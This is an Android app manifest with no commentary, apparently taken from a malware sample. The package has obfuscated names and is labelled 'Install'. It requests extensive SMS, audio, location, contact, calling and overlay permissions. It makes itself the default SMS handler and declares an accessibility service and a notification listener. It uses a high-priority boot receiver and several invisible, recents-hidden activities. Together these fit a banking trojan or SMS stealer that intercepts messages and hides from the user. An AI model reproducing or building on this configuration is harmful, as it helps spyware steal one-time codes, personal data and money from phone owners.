<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.ytbpkvambys.amikzx" platformBuildVersionCode="23" platformBuildVersionName="6.0-2438415">
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.REQUEST_DELETE_PACKAGES"/>
    <uses-permission android:name="android.permission.PACKAGE_USAGE_STATS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
    <application android:allowBackup="true" android:icon="@mipmap/abyxpwbl" android:label="Install" android:name="com.oisencn.zireimaise.cvlAsSni" android:supportsRtl="true" android:theme="@android:style/Theme.Translucent.NoTitleBar">
        <activity android:exported="false" android:name="com.google.android.gms.common.api.GoogleApiActivity" android:theme="@android:style/Theme.Translucent.NoTitleBar"/>
        <meta-data android:name="com.google.android.gms.version" android:value="12211000"/>
        <meta-data android:name="android.support.VERSION" android:value="26.1.0"/>
        <meta-data android:name="android.arch.lifecycle.VERSION" android:value="27.0.0-SNAPSHOT"/>
        <activity android:name="com.ytbpkvambys.amikzx.xfixgjgz.XdYxmUgoO">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <receiver android:name="com.ytbpkvambys.amikzx.shambjgwc.RVhIONXZm" android:permission="android.permission.BROADCAST_SMS">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_DELIVER"/>
            </intent-filter>
        </receiver>
        <activity android:label="rbekuochyeft" android:name="com.ytbpkvambys.amikzx.gisykprt"/>
        <receiver android:enabled="true" android:name="com.ytbpkvambys.amikzx.shambjgwc.HGeIVHeIT" android:permission="android.permission.BROADCAST_WAP_PUSH">
            <intent-filter>
                <action android:name="android.provider.Telephony.WAP_PUSH_DELIVER"/>
                <data android:mimeType="application/vnd.wap.mms-message"/>
            </intent-filter>
        </receiver>
        <activity android:name="com.ytbpkvambys.amikzx.RrnNkJLW">
            <intent-filter>
                <action android:name="android.intent.action.SENDTO"/>
                <action android:name="android.intent.action.SEND"/>
                <data android:scheme="sms"/>
                <data android:scheme="smsto"/>
                <data android:scheme="mms"/>
                <data android:scheme="mmsto"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
            </intent-filter>
        </activity>
        <service android:exported="true" android:name="com.ytbpkvambys.amikzx.WTdFYZRQGvQ" android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE">
            <intent-filter>
                <action android:name="android.intent.action.RESPOND_VIA_MESSAGE"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <data android:scheme="sms"/>
                <data android:scheme="smsto"/>
                <data android:scheme="mms"/>
                <data android:scheme="mmsto"/>
            </intent-filter>
        </service>
        <service android:name="com.ytbpkvambys.amikzx.shkypkqk"/>
        <activity android:label="fpxobkxkmin" android:name="com.ytbpkvambys.amikzx.umnxqhgbzj"/>
        <service android:enabled="true" android:exported="true" android:name="com.ytbpkvambys.amikzx.vtUxCMFrHzuA"/>
        <service android:enabled="true" android:exported="true" android:name="com.ytbpkvambys.amikzx.liJDbUKpw"/>
        <receiver android:name="com.ytbpkvambys.amikzx.shambjgwc.brJMistnHdbQ">
            <intent-filter android:priority="999">
                <action android:name="android.intent.action.QUICKBOOT_POWERON"/>
                <action android:name="android.intent.action.USER_PRESENT"/>
                <action android:name="com.htc.intent.action.QUICKBOOT_POWERON"/>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.SCREEN_ON"/>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
                <action android:name="android.net.wifi.WIFI_STATE_CHANGED"/>
                <action android:name="android.intent.action.EXTERNAL_APPLICATIONS_AVAILABLE"/>
                <category android:name="android.intent.category.HOME"/>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
                <action android:name="android.intent.action.DREAMING_STOPPED"/>
                <action android:name="android.intent.action.PACKAGE_REMOVED"/>
            </intent-filter>
        </receiver>
        <activity android:excludeFromRecents="true" android:icon="@drawable/pwsctfduag" android:name="com.ytbpkvambys.amikzx.xfixgjgz.nEcOfaOjA" android:theme="@android:style/Theme.NoDisplay"/>
        <activity android:icon="@drawable/pwsctfduag" android:label="" android:name="com.ytbpkvambys.amikzx.ilkicn.yocqojdzxq.hXLtTiIqIn"/>
        <activity android:excludeFromRecents="true" android:icon="@drawable/pwsctfduag" android:label="" android:launchMode="singleTask" android:name="com.ytbpkvambys.amikzx.xfixgjgz.ZMVnWtd"/>
        <activity android:excludeFromRecents="true" android:label="" android:launchMode="singleTask" android:name="com.ytbpkvambys.amikzx.xfixgjgz.FKJLTmykon"/>
        <activity android:icon="@drawable/pwsctfduag" android:label="" android:launchMode="singleTask" android:name="com.ytbpkvambys.amikzx.xfixgjgz.YfkxVPbUzpSm"/>
        <activity android:excludeFromRecents="true" android:icon="@drawable/pwsctfduag" android:label="" android:launchMode="singleTask" android:name="com.ytbpkvambys.amikzx.xfixgjgz.MXgBLdXgxMus"/>
        <activity android:icon="@drawable/pwsctfduag" android:label="" android:name="com.ytbpkvambys.amikzx.xfixgjgz.obkwJOaAcacD"/>
        <activity android:excludeFromRecents="true" android:label="" android:launchMode="singleTask" android:name="com.ytbpkvambys.amikzx.xfixgjgz.NevnTeoL"/>
        <activity android:excludeFromRecents="true" android:icon="@drawable/pwsctfduag" android:label="" android:launchMode="singleTask" android:name="com.ytbpkvambys.amikzx.xfixgjgz.EnDrylHE"/>
        <activity android:excludeFromRecents="true" android:icon="@drawable/pwsctfduag" android:label="" android:launchMode="singleTask" android:name="com.ytbpkvambys.amikzx.xfixgjgz.TSRQrl"/>
        <receiver android:enabled="true" android:exported="false" android:name="com.ytbpkvambys.amikzx.shambjgwc.cJOosiZHK"/>
        <service android:exported="false" android:name="com.ytbpkvambys.amikzx.MsGWTIcI"/>
        <activity android:label="aspmwieo" android:name="com.ytbpkvambys.amikzx.ykqdjhlbek"/>
        <service android:enabled="true" android:exported="true" android:name="com.ytbpkvambys.amikzx.KLoytV"/>
        <service android:enabled="true" android:exported="true" android:name="com.ytbpkvambys.amikzx.PNWHNflmfjO"/>
        <service android:exported="false" android:name="com.ytbpkvambys.amikzx.zeCmBcIgmFo"/>
        <service android:exported="false" android:name="com.ytbpkvambys.amikzx.EifdHX"/>
        <service android:enabled="true" android:exported="true" android:name="com.ytbpkvambys.amikzx.ogXftygDA"/>
        <service android:enabled="true" android:exported="true" android:name="com.ytbpkvambys.amikzx.HhUbmMiGdM"/>
        <service android:label="Install" android:name="com.ytbpkvambys.amikzx.wfPXGvZgYvrK" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService"/>
            </intent-filter>
            <meta-data android:name="android.accessibilityservice" android:resource="@xml/cptnyle"/>
        </service>
        <service android:exported="false" android:name="com.ytbpkvambys.amikzx.ATgYPgxf"/>
        <service android:exported="true" android:name="com.ytbpkvambys.amikzx.ilkicn.yocqojdzxq.qmUTSlPITIKg"/>
        <service android:exported="false" android:name="com.ytbpkvambys.amikzx.ilkicn.yocqojdzxq.aGHTnfHGxCt"/>
        <service android:exported="false" android:name="com.ytbpkvambys.amikzx.ilkicn.rcyoeqlnsqnr.dJGnMsGNobhb"/>
        <service android:exported="false" android:name="com.ytbpkvambys.amikzx.mPdqFd"/>
        <activity android:label="agkwuzajtuic" android:name="com.ytbpkvambys.amikzx.tyrebzuhjzr"/>
        <service android:exported="false" android:name="com.ytbpkvambys.amikzx.SazwUc"/>
        <service android:exported="false" android:name="com.ytbpkvambys.amikzx.Kxrlqz"/>
        <activity android:icon="@drawable/pwsctfduag" android:label="" android:name="com.ytbpkvambys.amikzx.xfixgjgz.qFKoJbahtK"/>
        <activity android:label="qmamsd" android:name="com.ytbpkvambys.amikzx.znzwmf"/>
        <service android:exported="false" android:name="com.ytbpkvambys.amikzx.ilkicn.rcyoeqlnsqnr.KUcYCdGl"/>
        <activity android:icon="@drawable/pwsctfduag" android:label="" android:name="com.ytbpkvambys.amikzx.xfixgjgz.FBoyWhI"/>
        <activity android:icon="@drawable/pwsctfduag" android:label="" android:name="com.ytbpkvambys.amikzx.xfixgjgz.UHxlCHwb"/>
        <service android:name="com.ytbpkvambys.amikzx.dsntayqf"/>
        <service android:exported="false" android:name="com.ytbpkvambys.amikzx.ilkicn.ibvnsvyn.XFYhetwNiCe"/>
        <activity android:label="ktsatp" android:name="com.ytbpkvambys.amikzx.vbfrwflxwq"/>
        <service android:enabled="true" android:exported="true" android:name="com.ytbpkvambys.amikzx.ilkicn.ibvnsvyn.tiKsTDirtS"/>
        <service android:exported="false" android:name="com.ytbpkvambys.amikzx.efunlivnlk.YkGldnqxe"/>
        <activity android:icon="@drawable/pwsctfduag" android:label="" android:name="com.ytbpkvambys.amikzx.xfixgjgz.kMOWEblTkLjV"/>
        <service android:exported="false" android:name="com.ytbpkvambys.amikzx.DRxsdwIHg"/>
        <service android:name="com.ytbpkvambys.amikzx.mFQjTmHLy"/>
        <activity android:label="jxzpatjf" android:name="com.ytbpkvambys.amikzx.dabgpqzyngki"/>
        <service android:name="com.ytbpkvambys.amikzx.HgJaqNswba"/>
        <service android:enabled="true" android:exported="false" android:name="com.ytbpkvambys.amikzx.xvsirzmorczn.UwUZLwJTdz"/>
        <activity android:label="xdafgsuxga" android:name="com.ytbpkvambys.amikzx.nciqkjg"/>
        <service android:enabled="true" android:exported="true" android:name="com.ytbpkvambys.amikzx.xvsirzmorczn.SPYlXP" android:permission="android.permission.BIND_JOB_SERVICE"/>
        <service android:name="com.ytbpkvambys.amikzx.UQyJPqVc" android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
            <intent-filter>
                <action android:name="android.service.notification.NotificationListenerService"/>
            </intent-filter>
        </service>
    </application>
</manifest>